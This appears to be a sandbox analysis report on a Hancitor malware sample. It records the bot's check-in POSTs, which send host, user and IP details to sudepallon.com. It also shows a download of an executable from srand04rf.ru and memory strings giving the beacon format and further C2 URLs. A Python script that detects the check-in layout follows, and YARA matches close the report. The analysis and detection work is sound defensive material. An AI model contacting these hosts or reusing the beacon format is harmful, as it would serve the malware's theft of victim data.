                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02E51FE0 GetNextDlgTabItem,InternetCrackUrlA,CharPrevA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: api.ipify.org | Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: srand04rf.ru | Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /?format=xml HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.ipify.org | Connection: Keep-Alive
                  Source: unknown | DNS traffic detected: queries for: api.ipify.org
                  Source: unknown | HTTP traffic detected: POST /8/forum.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: sudepallon.com | Content-Length: 121 | Cache-Control: no-cache | Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 | Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmp | String found in binary or memory: http://anspossthrly.ru/8/forum.php
                  Source: rundll32.exe | String found in binary or memory: http://api.ipify.org
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | String found in binary or memory: http://api.ipify.org/
                  Source: rundll32.exe, 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp | String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.447086545.000000000306B000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php
                  Source: rundll32.exe, 00000003.00000003.460449950.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php&
                  Source: rundll32.exe, 00000003.00000003.459490879.000000000304A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php.com/8/forum.php
                  Source: rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php.com/8/forum.phpeBH
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php2
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php6O
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php8
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php:
                  Source: rundll32.exe, 00000003.00000002.488661456.000000000306C000.00000004.00000020.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.php=
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpK
                  Source: rundll32.exe, 00000003.00000003.449636554.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpT
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpb
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpeBH
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpea
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phph
                  Source: rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.488695100.0000000003074000.00000004.00000020.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpk
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phponnection:
                  Source: rundll32.exe, 00000003.00000003.468221370.000000000306B000.00000004.00000001.sdmp | String found in binary or memory: http://sudepallon.com/8/forum.phpp
                  Source: rundll32.exe, 00000003.00000003.470696238.0000000003076000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phppR
                  Source: rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpq
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phps
                  Source: rundll32.exe, 00000003.00000003.370674723.000000000306B000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/fjsdfjks.exe
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmpString found in binary or memory: http://thentabecon.ru/8/forum.php
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E556 VirtualAlloc,VirtualAlloc,VirtualAlloc,IsWindowEnabled,FlsFree,FlsFree,VirtualProtect,VirtualProtect,GetAsyncKeyState,GetProcAddress,LoadLibraryExA,VirtualProtect,InitDManipHook,VirtualProtect,VirtualFree,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E787F7 CreateDesktopExW,_strlen,SetRect,
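The memory strings above give away the bot's check-in layout: the format string GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), the api.ipify.org lookup that sits next to it, and the /8/forum.php paths on sudepallon.com and thentabecon.ru. The following is an added example, not code from the report or the sandbox, showing how a proxy or IDS post-processor can recognise that layout in a POST body independent of the C2 host, which changes between campaigns while the field order does not. The HTTP requests it is tested on are constructed; the host blocklist is the two domains seen in the dumps.

```python
"""
Parse and flag Hancitor-style check-in requests.

Added example, not part of the sandbox report. The field layout follows the
format string recovered from the rundll32.exe memory dumps:
    GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
The requests fed to it are constructed, not traffic captured by the sandbox.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Field order of the check-in body, taken from the format string.
CHECKIN_FIELDS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
# WIN is "<major>.<minor>" with an "(x64)" suffix on 64-bit hosts.
WIN_RE = re.compile(r"^\d+\.\d+(\(x64\))?$")
# C2 hosts from the memory strings, used here as a static blocklist.
KNOWN_C2_HOSTS = {"sudepallon.com", "thentabecon.ru"}


def parse_checkin(body: str):
    """Return the check-in fields as a dict if body matches the layout, else None."""
    pairs = parse_qsl(body, keep_blank_values=True)   # EXT is often empty
    if [key for key, _ in pairs] != list(CHECKIN_FIELDS):
        return None
    fields = dict(pairs)
    if not fields["GUID"].isdigit():    # %I64u: unsigned decimal
        return None
    if fields["TYPE"] != "1":           # hard-coded in the format string
        return None
    if not WIN_RE.match(fields["WIN"]):
        return None
    return fields


def classify_request(method: str, url: str, body: str) -> dict:
    """Score one HTTP request: verdict, supporting reasons and parsed fields (if any)."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in KNOWN_C2_HOSTS:
        reasons.append(f"known C2 host {host}")
    if host == "api.ipify.org":
        reasons.append("external IP lookup via api.ipify.org")
    fields = parse_checkin(body) if method.upper() == "POST" else None
    if fields is not None:
        reasons.append("body matches Hancitor check-in layout")
        if parts.path.endswith("/forum.php"):
            reasons.append("C2 path ends in /forum.php")
    if fields is not None:
        verdict = "hancitor_checkin"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "reasons": reasons, "fields": fields}


# Constructed check-in body in the recovered layout (all values are made up).
SAMPLE_BODY = ("GUID=1234567890123&BUILD=lab_build&INFO=LAB-PC @ LAB-PC\\user"
               "&EXT=&IP=203.0.113.5&TYPE=1&WIN=10.0(x64)")

if __name__ == "__main__":
    for req in (("GET", "http://api.ipify.org/", ""),
                ("POST", "http://sudepallon.com/8/forum.php", SAMPLE_BODY),
                ("POST", "http://example.org/forum.php", "a=1&b=2")):
        print(req[0], req[1], "->", classify_request(*req)["verdict"])
```

The body check is strict on field order and on the two constants (TYPE=1, the WIN version format) because those come straight from the format string; the host and path checks only add confidence, since the operators rotate domains far more often than they change the beacon format.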

                  System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004293B0: GetFileInformationByHandle,DeviceIoControl,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E61E10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E71B95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7BB0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5F0C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E72068
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E72848
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E6B1F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7A1C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E6F92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E6FF50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7A705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E79C81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E72C68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7547B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7243C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040E85F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00415800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040F9C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004122DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004220F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00425141
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042D972
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042F101
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004261C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004221DF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00430268
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040727F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042FA0C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040B2F3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042FB2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00432BF4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040A3A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042F445
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00420408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00430C08
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004314CB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00409CE5
